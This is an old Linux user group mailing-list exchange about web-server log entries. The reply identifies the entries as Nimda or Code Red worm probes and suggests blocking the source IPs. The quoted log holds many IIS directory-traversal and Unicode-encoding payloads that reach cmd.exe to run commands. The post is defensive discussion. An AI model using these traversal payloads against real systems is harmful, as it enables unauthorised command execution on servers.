[olug] Is this a virus?

einer andrew at einer.org
Tue May 21 18:41:04 UTC 2002


nimda or Code Red.  

Not much you can do to keep these servers from attacking you except 
maybe blocking their ip.

Well, not much 'legally' you can do.  These machines are actually 
already exploited and wide open.  There was a code green worm that used 
the same vulnerabilities and fixed these holes.  Not sure if one ever 
came out that took care of nimda.  Either way, the ethics involved in 
creating a retro virus are questionable, simply because of the 
possibility of severe and truly ugly breakage.

Black hole em as they come.

Andrew

Jonathan Warren wrote:

>I am getting these in my access.log.  Any suggestions on how to shut up the offending servers?
>
>68.13.41.165 - - [10/May/2002:14:20:40 -0500] "GET /scripts/root.exe?/c+dir HTTP
>/1.0" 404 287
>68.13.41.165 - - [10/May/2002:14:20:43 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1
>.0" 404 285
>68.13.41.165 - - [10/May/2002:14:20:45 -0500] "GET /c/winnt/system32/cmd.exe?/c+
>dir HTTP/1.0" 404 295
>68.13.41.165 - - [10/May/2002:14:20:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+
>dir HTTP/1.0" 404 295
>68.13.41.165 - - [10/May/2002:14:20:49 -0500] "GET /scripts/..%255c../winnt/syst
>em32/cmd.exe?/c+dir HTTP/1.0" 404 309
>68.13.41.165 - - [10/May/2002:14:20:51 -0500] "GET /_vti_bin/..%255c../..%255c..
>/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
>68.13.41.165 - - [10/May/2002:14:20:53 -0500] "GET /_mem_bin/..%255c../..%255c..
>/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
>68.13.41.165 - - [10/May/2002:14:20:55 -0500] "GET /msadc/..%255c../..%255c../..
>%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 4
>04 342
>68.13.41.165 - - [10/May/2002:14:20:57 -0500] "GET /scripts/..%c1%1c../winnt/sys
>tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:20:59 -0500] "GET /scripts/..%c0%2f../winnt/sys
>tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:00 -0500] "GET /scripts/..%c0%af../winnt/sys
>tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:01 -0500] "GET /scripts/..%c1%9c../winnt/sys
>tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
>68.13.41.165 - - [10/May/2002:14:21:02 -0500] "GET /scripts/..%%35%63../winnt/sy
>stem32/cmd.exe?/c+dir HTTP/1.0" 400 292
>68.13.41.165 - - [10/May/2002:14:21:03 -0500] "GET /scripts/..%%35c../winnt/syst
>em32/cmd.exe?/c+dir HTTP/1.0" 400 292
>68.13.41.165 - - [10/May/2002:14:21:04 -0500] "GET /scripts/..%25%35%63../winnt/
>system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>68.13.41.165 - - [10/May/2002:14:21:05 -0500] "GET /scripts/..%252f../winnt/syst
>em32/cmd.exe?/c+dir HTTP/1.0" 404 309
>167.132.64.131 - - [14/May/2002:07:03:55 -0500] "GET /~thechunk HTTP/1.1" 301 33
>3
>
>
>-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
>
>For help contact olug-help at olug.org - run by ezmlm
>to unsubscribe, send mail to olug-unsubscribe at olug.org
>or `mail olug-unsubscribe at olug.org < /dev/null`
>(c)1998-2002 OLUG http://www.olug.org
>
>-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
>  
>




-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

For help contact olug-help at olug.org - run by ezmlm
to unsubscribe, send mail to olug-unsubscribe at olug.org
or `mail olug-unsubscribe at olug.org < /dev/null`
(c)1998-2002 OLUG http://www.olug.org

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_




More information about the OLUG mailing list